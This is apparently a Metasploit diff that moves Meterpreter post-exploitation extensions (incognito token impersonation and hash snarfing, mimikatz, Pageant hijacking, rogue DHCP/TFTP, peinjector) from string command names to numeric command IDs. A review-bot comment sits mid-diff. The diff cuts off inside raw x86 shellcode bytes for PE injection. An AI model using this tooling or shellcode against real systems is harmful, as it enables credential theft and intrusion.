-87,7 +87,7 @@ def monitor_dump(opts) # Resume the clipboard monitor if it has been paused. # def monitor_resume - request = Packet.create_request('extapi_clipboard_monitor_resume') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME) return client.send_request(request) end @@ -95,7 +95,7 @@ def monitor_resume # Purge the contents of the clipboard capture without downloading. # def monitor_purge - request = Packet.create_request('extapi_clipboard_monitor_purge') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE) return client.send_request(request) end 
@@ -106,7 +106,7 @@ def monitor_stop(opts) dump = opts[:dump] pull_img = opts[:include_images] - request = Packet.create_request('extapi_clipboard_monitor_stop') + request = Packet.create_request(COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_DUMP, dump) request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_MON_CAP_IMG_DATA, pull_img) diff --git a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb index 900087ea6d994..05dc02c946f0d 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/extapi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/extapi.rb @@ -23,6 +23,10 @@ module Extapi ### class Extapi < Extension + def self.extension_id + EXTENSION_ID_EXTAPI + end + def initialize(client) super(client, 'extapi') diff --git a/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb b/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb index c6fb7515a3fbf..75a4095106ee2 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/ntds/ntds.rb @@ -20,7 +20,7 @@ def initialize(client) end def parse(filepath) - request = Packet.create_request('extapi_ntds_parse') + request = Packet.create_request(COMMAND_ID_EXTAPI_NTDS_PARSE) request.add_tlv( TLV_TYPE_NTDS_PATH, filepath) # wait up to 90 seconds for a response response = client.send_request(request, 90) diff --git a/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb b/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb index dda54561caab2..868522d5d75a2 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/pageant/pageant.rb 
@@ -1,44 +1,46 @@ # -*- coding: binary -*- module Rex - module Post - module Meterpreter - module Extensions - module Extapi - module Pageant - ### - # PageantJacker extension - Hijack and interact with Pageant - # - # Stuart Morgan - # - ### - class Pageant - def initialize(client) - @client = client - end - - def forward(blob, size) - return nil unless size > 0 && blob.size > 0 - - packet_request = Packet.create_request('extapi_pageant_send_query') - packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size) - packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob) - - response = client.send_request(packet_request) - return nil unless response - - { - success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS), - blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB), - error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE) - } - end - - attr_accessor :client - end - end - end - end - end +module Post +module Meterpreter +module Extensions +module Extapi +module Pageant + +### +# PageantJacker extension - Hijack and interact with Pageant +# +# Stuart Morgan +# +### +class Pageant + def initialize(client) + @client = client end + + def forward(blob, size) + return nil unless size > 0 && blob.size > 0 + + packet_request = Packet.create_request(COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY) + packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_SIZE_IN, size) + packet_request.add_tlv(TLV_TYPE_EXTENSION_PAGEANT_BLOB_IN, blob) + + response = client.send_request(packet_request) + return nil unless response + + { + success: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_STATUS), + blob: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_RETURNEDBLOB), + error: response.get_tlv_value(TLV_TYPE_EXTENSION_PAGEANT_ERRORMESSAGE) + } + end + + attr_accessor :client +end + +end +end +end +end +end end 
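Review bot: This hunk re-indents the whole of pageant.rb to change a single functional line, `packet_request = Packet.create_request(COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY)`, so the command-id change is buried in whitespace noise; window.rb (L48–L49) and peinjector.rb (L58) follow the same pattern. Splitting the reformat into its own commit, or at least calling it out in the description so reviewers diff with whitespace ignored, would keep the wire-protocol change auditable on its own. On the new side, `attr_accessor :client` exposes a writer that nothing in the class uses — `initialize` assigns `@client` and `forward` only reads it — so `attr_reader :client` would be the tighter declaration.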
diff --git a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb index 0318c1aeacf55..5a4e0e1656645 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/service/service.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/service/service.rb @@ -29,7 +29,7 @@ def initialize(client) # Enumerate all the services on the target. # def enumerate - request = Packet.create_request('extapi_service_enum') + request = Packet.create_request(COMMAND_ID_EXTAPI_SERVICE_ENUM) response = client.send_request(request) services = [] @@ -51,7 +51,7 @@ def enumerate # Query some detailed parameters about a particular service. # def query(service_name) - request = Packet.create_request('extapi_service_query') + request = Packet.create_request(COMMAND_ID_EXTAPI_SERVICE_QUERY) request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name) response = client.send_request(request) @@ -91,7 +91,7 @@ def control(service_name, op) raise ArgumentError, "Invalid operation: #{op}" end - request = Packet.create_request('extapi_service_control') + request = Packet.create_request(COMMAND_ID_EXTAPI_SERVICE_CONTROL) request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_NAME, service_name) request.add_tlv(TLV_TYPE_EXT_SERVICE_CTRL_OP, op) client.send_request(request) diff --git a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb index 9f4c09c95a459..609fd8e49a329 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/tlv.rb 
@@ -5,6 +5,27 @@ module Meterpreter module Extensions module Extapi +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_EXTAPI = 3000 + +# Associated command ids +COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY = EXTENSION_ID_EXTAPI + 1 +COMMAND_ID_EXTAPI_CLIPBOARD_GET_DATA = EXTENSION_ID_EXTAPI + 2 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_DUMP = EXTENSION_ID_EXTAPI + 3 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PAUSE = EXTENSION_ID_EXTAPI + 4 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_PURGE = EXTENSION_ID_EXTAPI + 5 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_RESUME = EXTENSION_ID_EXTAPI + 6 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_START = EXTENSION_ID_EXTAPI + 7 +COMMAND_ID_EXTAPI_CLIPBOARD_MONITOR_STOP = EXTENSION_ID_EXTAPI + 8 +COMMAND_ID_EXTAPI_CLIPBOARD_SET_DATA = EXTENSION_ID_EXTAPI + 9 +COMMAND_ID_EXTAPI_NTDS_PARSE = EXTENSION_ID_EXTAPI + 10 +COMMAND_ID_EXTAPI_PAGEANT_SEND_QUERY = EXTENSION_ID_EXTAPI + 11 +COMMAND_ID_EXTAPI_SERVICE_CONTROL = EXTENSION_ID_EXTAPI + 12 +COMMAND_ID_EXTAPI_SERVICE_ENUM = EXTENSION_ID_EXTAPI + 13 +COMMAND_ID_EXTAPI_SERVICE_QUERY = EXTENSION_ID_EXTAPI + 14 +COMMAND_ID_EXTAPI_WINDOW_ENUM = EXTENSION_ID_EXTAPI + 15 +COMMAND_ID_EXTAPI_WMI_QUERY = EXTENSION_ID_EXTAPI + 16 + TLV_TYPE_EXTENSION_EXTAPI = 0 TLV_TYPE_EXT_WINDOW_ENUM_GROUP = TLV_META_TYPE_GROUP | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 1) diff --git a/lib/rex/post/meterpreter/extensions/extapi/window/window.rb b/lib/rex/post/meterpreter/extensions/extapi/window/window.rb index cf359d7d76d30..9210d32b53f6e 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/window/window.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/window/window.rb 
@@ -1,60 +1,61 @@ # -*- coding: binary -*- module Rex - module Post - module Meterpreter - module Extensions - module Extapi - module Window - ### - # - # This meterpreter extension contains extended API functions for - # querying and managing desktop windows. - # - ### - class Window - - def initialize(client) - @client = client - end - - # Enumerate all the windows on the target. - # If the specified parent window is nil, then all top-level windows - # are enumerated. Otherwise, all child windows of the specified - # parent window are enumerated. - def enumerate(include_unknown = false, parent_window = nil) - request = Packet.create_request('extapi_window_enum') - - if include_unknown - request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true) - end - - if !parent_window.nil? - request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window) - end - - response = client.send_request(request) - - windows = [] - - response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) do |w| - windows << { - pid: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID), - handle: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE), - title: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE), - class_name: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME) - } - end - - windows.sort_by { |w| w[:pid] } - end - - attr_accessor :client - - end - end - end - end +module Post +module Meterpreter +module Extensions +module Extapi +module Window + +### +# +# This meterpreter extension contains extended API functions for +# querying and managing desktop windows. +# +### +class Window + + def initialize(client) + @client = client + end + + # Enumerate all the windows on the target. + # If the specified parent window is nil, then all top-level windows + # are enumerated. Otherwise, all child windows of the specified + # parent window are enumerated. 
+ def enumerate(include_unknown = false, parent_window = nil) + request = Packet.create_request(COMMAND_ID_EXTAPI_WINDOW_ENUM) + + if include_unknown + request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true) + end + + if !parent_window.nil? + request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window) + end + + response = client.send_request(request) + + windows = [] + + response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) do |w| + windows << { + pid: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID), + handle: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE), + title: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE), + class_name: w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_CLASSNAME) + } end + + windows.sort_by { |w| w[:pid] } end + + attr_accessor :client + +end +end +end +end +end +end end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index a69cfdfb077ca..c5de56d1c08e2 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -29,7 +29,7 @@ def initialize(client) # @return [Hash] Array of field names with associated values. # def query(query, root = nil) - request = Packet.create_request('extapi_wmi_query') + request = Packet.create_request(COMMAND_ID_EXTAPI_WMI_QUERY) request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.strip.empty? request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) diff --git a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb index 12d69376159b8..bfddad0c6af8b 100644 --- a/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +++ b/lib/rex/post/meterpreter/extensions/incognito/incognito.rb @@ -17,6 +17,9 @@ module Incognito ### class Incognito < Extension + def self.extension_id + EXTENSION_ID_INCOGNITO + end def initialize(client) super(client, 'incognito') 
@@ -30,21 +33,20 @@ def initialize(client) ]) end - def incognito_list_tokens(token_order) - request = Packet.create_request('incognito_list_tokens') + request = Packet.create_request(COMMAND_ID_INCOGNITO_LIST_TOKENS) request.add_tlv(TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER, token_order) response = client.send_request(request) - return { + { 'delegation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION), 'impersonation' => response.get_tlv_value(TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION) } end def incognito_impersonate_token(username) - request = Packet.create_request('incognito_impersonate_token') + request = Packet.create_request(COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN) request.add_tlv(TLV_TYPE_INCOGNITO_IMPERSONATE_TOKEN, username) response = client.send_request(request) @@ -52,7 +54,7 @@ def incognito_impersonate_token(username) end def incognito_add_user(host, username, password) - request = Packet.create_request('incognito_add_user') + request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_USER) request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username) request.add_tlv(TLV_TYPE_INCOGNITO_PASSWORD, password) request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host) @@ -62,7 +64,7 @@ def incognito_add_user(host, username, password) end def incognito_add_group_user(host, groupname, username) - request = Packet.create_request('incognito_add_group_user') + request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_GROUP_USER) request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username) request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname) request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host) 
@@ -72,7 +74,7 @@ def incognito_add_group_user(host, groupname, username) end def incognito_add_localgroup_user(host, groupname, username) - request = Packet.create_request('incognito_add_localgroup_user') + request = Packet.create_request(COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER) request.add_tlv(TLV_TYPE_INCOGNITO_USERNAME, username) request.add_tlv(TLV_TYPE_INCOGNITO_GROUPNAME, groupname) request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host) @@ -82,11 +84,11 @@ def incognito_add_localgroup_user(host, groupname, username) end def incognito_snarf_hashes(host) - request = Packet.create_request('incognito_snarf_hashes') + request = Packet.create_request(COMMAND_ID_INCOGNITO_SNARF_HASHES) request.add_tlv(TLV_TYPE_INCOGNITO_SERVERNAME, host) - response = client.send_request(request) + client.send_request(request) - return true + true end end diff --git a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb index 586e69171abe6..9dadb86ab2e77 100644 --- a/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/incognito/tlv.rb @@ -5,6 +5,17 @@ module Meterpreter module Extensions module Incognito +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_INCOGNITO = 12000 + +# Associated command ids +COMMAND_ID_INCOGNITO_ADD_GROUP_USER = EXTENSION_ID_INCOGNITO + 1 +COMMAND_ID_INCOGNITO_ADD_LOCALGROUP_USER = EXTENSION_ID_INCOGNITO + 2 +COMMAND_ID_INCOGNITO_ADD_USER = EXTENSION_ID_INCOGNITO + 3 +COMMAND_ID_INCOGNITO_IMPERSONATE_TOKEN = EXTENSION_ID_INCOGNITO + 4 +COMMAND_ID_INCOGNITO_LIST_TOKENS = EXTENSION_ID_INCOGNITO + 5 +COMMAND_ID_INCOGNITO_SNARF_HASHES = EXTENSION_ID_INCOGNITO + 6 + TLV_TYPE_INCOGNITO_LIST_TOKENS_DELEGATION = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_INCOGNITO_LIST_TOKENS_IMPERSONATION = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) TLV_TYPE_INCOGNITO_LIST_TOKENS_ORDER = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 4) 
diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 0836f1393b4e1..7c0d820df925c 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -22,6 +22,10 @@ module Kiwi class Kiwi < Extension + def self.extension_id + EXTENSION_ID_KIWI + end + # # Typical extension initialization routine. # @@ -43,7 +47,7 @@ def initialize(client) end def exec_cmd(cmd) - request = Packet.create_request('kiwi_exec_cmd') + request = Packet.create_request(COMMAND_ID_KIWI_EXEC_CMD) request.add_tlv(TLV_TYPE_KIWI_CMD, cmd) response = client.send_request(request) output = response.get_tlv_value(TLV_TYPE_KIWI_CMD_RESULT) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index c57db2c4c53dd..7437679256de5 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -5,8 +5,14 @@ module Meterpreter module Extensions module Kiwi -TLV_TYPE_KIWI_CMD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 100) -TLV_TYPE_KIWI_CMD_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 101) +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_KIWI = 8000 + +# Associated command ids +COMMAND_ID_KIWI_EXEC_CMD = EXTENSION_ID_KIWI + 1 + +TLV_TYPE_KIWI_CMD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 100) +TLV_TYPE_KIWI_CMD_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 101) end end diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb b/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb index 5c394717783b1..66e478b450fae 100644 --- a/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb +++ b/lib/rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp.rb 
@@ -21,17 +21,17 @@ def initialize(client) end def start - client.send_request(Packet.create_request('lanattacks_start_dhcp')) + client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_START_DHCP)) true end def reset - client.send_request(Packet.create_request('lanattacks_reset_dhcp')) + client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_RESET_DHCP)) true end def set_option(name, value) - request = Packet.create_request('lanattacks_set_dhcp_option') + request = Packet.create_request(COMMAND_ID_LANATTACKS_SET_DHCP_OPTION) request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name) request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value) client.send_request(request) @@ -50,12 +50,12 @@ def load_options(datastore) end def stop - client.send_request(Packet.create_request('lanattacks_stop_dhcp')) + client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_STOP_DHCP)) true end def log - response = client.send_request(Packet.create_request('lanattacks_dhcp_log')) + response = client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_DHCP_LOG)) entries = [] if( response.result == 0 ) log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW ) diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb index baa4817059f1a..af3aafe3b184a 100644 --- a/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb +++ b/lib/rex/post/meterpreter/extensions/lanattacks/lanattacks.rb @@ -17,6 +17,10 @@ module Lanattacks ### class Lanattacks < Extension + def self.extension_id + EXTENSION_ID_LANATTACKS + end + # # Initializes an instance of the lanattacks extension. # diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb index 3d1c287e749e3..04c0128a7aeef 100644 --- a/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb +++ b/lib/rex/post/meterpreter/extensions/lanattacks/tftp/tftp.rb 
@@ -21,17 +21,17 @@ def initialize(client) end def start - client.send_request(Packet.create_request('lanattacks_start_tftp')) + client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_START_TFTP)) true end def reset - client.send_request(Packet.create_request('lanattacks_reset_tftp')) + client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_RESET_TFTP)) true end def add_file(filename, data) - request = Packet.create_request('lanattacks_add_tftp_file') + request = Packet.create_request(COMMAND_ID_LANATTACKS_ADD_TFTP_FILE) request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename) request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it client.send_request(request) @@ -39,7 +39,7 @@ def add_file(filename, data) end def stop - client.send_request(Packet.create_request('lanattacks_stop_tftp')) + client.send_request(Packet.create_request(COMMAND_ID_LANATTACKS_STOP_TFTP)) true end diff --git a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb index 7a71196578244..d54b673872e5e 100644 --- a/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/lanattacks/tlv.rb 
@@ -5,6 +5,20 @@ module Meterpreter module Extensions module Lanattacks +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_LANATTACKS = 15000 + +# Associated command ids +COMMAND_ID_LANATTACKS_ADD_TFTP_FILE = EXTENSION_ID_LANATTACKS + 1 +COMMAND_ID_LANATTACKS_DHCP_LOG = EXTENSION_ID_LANATTACKS + 2 +COMMAND_ID_LANATTACKS_RESET_DHCP = EXTENSION_ID_LANATTACKS + 3 +COMMAND_ID_LANATTACKS_RESET_TFTP = EXTENSION_ID_LANATTACKS + 4 +COMMAND_ID_LANATTACKS_SET_DHCP_OPTION = EXTENSION_ID_LANATTACKS + 5 +COMMAND_ID_LANATTACKS_START_DHCP = EXTENSION_ID_LANATTACKS + 6 +COMMAND_ID_LANATTACKS_START_TFTP = EXTENSION_ID_LANATTACKS + 7 +COMMAND_ID_LANATTACKS_STOP_DHCP = EXTENSION_ID_LANATTACKS + 8 +COMMAND_ID_LANATTACKS_STOP_TFTP = EXTENSION_ID_LANATTACKS + 9 + TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1) TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb index 098e69494f10a..9952f2321a03f 100644 --- a/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb +++ b/lib/rex/post/meterpreter/extensions/mimikatz/mimikatz.rb @@ -21,6 +21,10 @@ module Mimikatz class Mimikatz < Extension + def self.extension_id + EXTENSION_ID_MIMIKATZ + end + def initialize(client) super(client, 'mimikatz') @@ -34,7 +38,7 @@ def initialize(client) end def send_custom_command_raw(function, args=[]) - request = Packet.create_request('mimikatz_custom_command') + request = Packet.create_request(COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND) request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function) args.each do |a| request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a) diff --git a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb index c260720b4a5f3..fb75fa41e7299 100644 
--- a/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/mimikatz/tlv.rb @@ -5,6 +5,12 @@ module Meterpreter module Extensions module Mimikatz +# ID for the extension (needs to be a multiple of 1000) +EXTENSION_ID_MIMIKATZ = 17000 + +# Associated command ids +COMMAND_ID_MIMIKATZ_CUSTOM_COMMAND = EXTENSION_ID_MIMIKATZ + 1 + TLV_TYPE_MIMIKATZ_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) TLV_TYPE_MIMIKATZ_FUNCTION = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) TLV_TYPE_MIMIKATZ_ARGUMENT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) diff --git a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb index ac0c0452952df..8f4abdc2d5a34 100644 --- a/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +++ b/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb @@ -13,6 +13,10 @@ module NetworkPug class NetworkPug < Extension + def self.extension_id + EXTENSION_ID_NETWORKPUG + end + def initialize(client) super(client, 'networkpug') @@ -26,7 +30,7 @@ def initialize(client) end def networkpug_start(interface, filter) - request = Packet.create_request('networkpug_start') + request = Packet.create_request(COMMAND_ID_NETWORKPUG_START) request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface) request.add_tlv(TLV_TYPE_NETWORKPUG_FILTER, filter) if(filter and filter != "") response = client.send_request(request) @@ -38,7 +42,7 @@ def networkpug_start(interface, filter) channel = Rex::Post::Meterpreter::Channels::Pools::StreamPool.new( client, channel_id, - "networkpug_interface", + 'networkpug_interface', CHANNEL_FLAG_SYNCHRONOUS, response ) 
@@ -48,9 +52,9 @@ def networkpug_start(interface, filter)
 end
 def networkpug_stop(interface)
- request = Packet.create_request('networkpug_stop')
+ request = Packet.create_request(COMMAND_ID_NETWORKPUG_STOP)
 request.add_tlv(TLV_TYPE_NETWORKPUG_INTERFACE, interface)
- response = client.send_request(request)
+ client.send_request(request)
 end
 end
diff --git a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
index 54e5941ab8ab9..22f6b0a9b0e5d 100644
--- a/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb
@@ -5,6 +5,13 @@ module Meterpreter
 module Extensions
 module NetworkPug
+# ID for the extension (needs to be a multiple of 1000)
+EXTENSION_ID_NETWORKPUG = 6000
+
+# Associated command ids
+COMMAND_ID_NETWORKPUG_START = EXTENSION_ID_NETWORKPUG + 1
+COMMAND_ID_NETWORKPUG_STOP = EXTENSION_ID_NETWORKPUG + 2
+
 TLV_TYPE_EXTENSION_NETWORKPUG = 0
 TLV_TYPE_NETWORKPUG_INTERFACE = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 1)
 TLV_TYPE_NETWORKPUG_FILTER = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_NETWORKPUG + TLV_EXTENSIONS + 2)
diff --git a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
index 28e608906ce74..52b5a91878071 100644
--- a/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
+++ b/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb
@@ -2,246 +2,251 @@ require 'rex/post/meterpreter/extensions/peinjector/tlv' module Rex - module Post - module Meterpreter - module Extensions - module Peinjector - ### - # - # This meterpreter extensions allow to inject a given shellcode into an executable file. - # - ### - class Peinjector < Extension - def initialize(client) - super(client, 'peinjector') - - client.register_extension_aliases( - [ - { - 'name' => 'peinjector', - 'ext' => self - } - ]) - end - - def inject_shellcode(opts = {}) - return nil unless opts[:shellcode] - - request = Packet.create_request('peinjector_inject_shellcode') - request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE, opts[:shellcode]) - request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_SIZE, opts[:size]) - request.add_tlv(TLV_TYPE_PEINJECTOR_SHELLCODE_ISX64, opts[:isx64]) - request.add_tlv(TLV_TYPE_PEINJECTOR_TARGET_EXECUTABLE, opts[:targetpe]) - - response = client.send_request(request) - - error_msg = response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT) - raise error_msg if error_msg - return response.get_tlv_value(TLV_TYPE_PEINJECTOR_RESULT) - end - - def add_thread_x86(payload) - stackpreserve = "\x90\x90\x60\x9c" # AUTOMATED ASM: x86 = ['nop', 'nop', 'pushad', 'pushfd'] - shellcode = "\xE8\xB7\xFF\xFF\xFF" # AUTOMATED ASM: x86 = ['call 0xffffffbc'] - shellcode += payload - - thread = "\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B" + # AUTOMATED ASM: x86 = ['cld', 'nop', 'call 0xc8', 'pushad', 'mov ebp, esp', 'xor edx, edx', 'nop', 'invalid'] - "\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02" + # AUTOMATED ASM: x86 = ['push edx', 'xor [ebx+0x528b0c52], cl', 'adc al, 0xeb', 'invalid'] - "\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61" + # AUTOMATED ASM: x86 = ['inc ecx', 'adc [ebx-0x48f0d78e], cl', 'dec edx', 'xor edi, edi', 'xor eax, eax', 'lodsb', 'cmp al, 0x61'] - "\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B" + # AUTOMATED ASM: x86 = ['jl 0x4', 'sub al, 0x20', 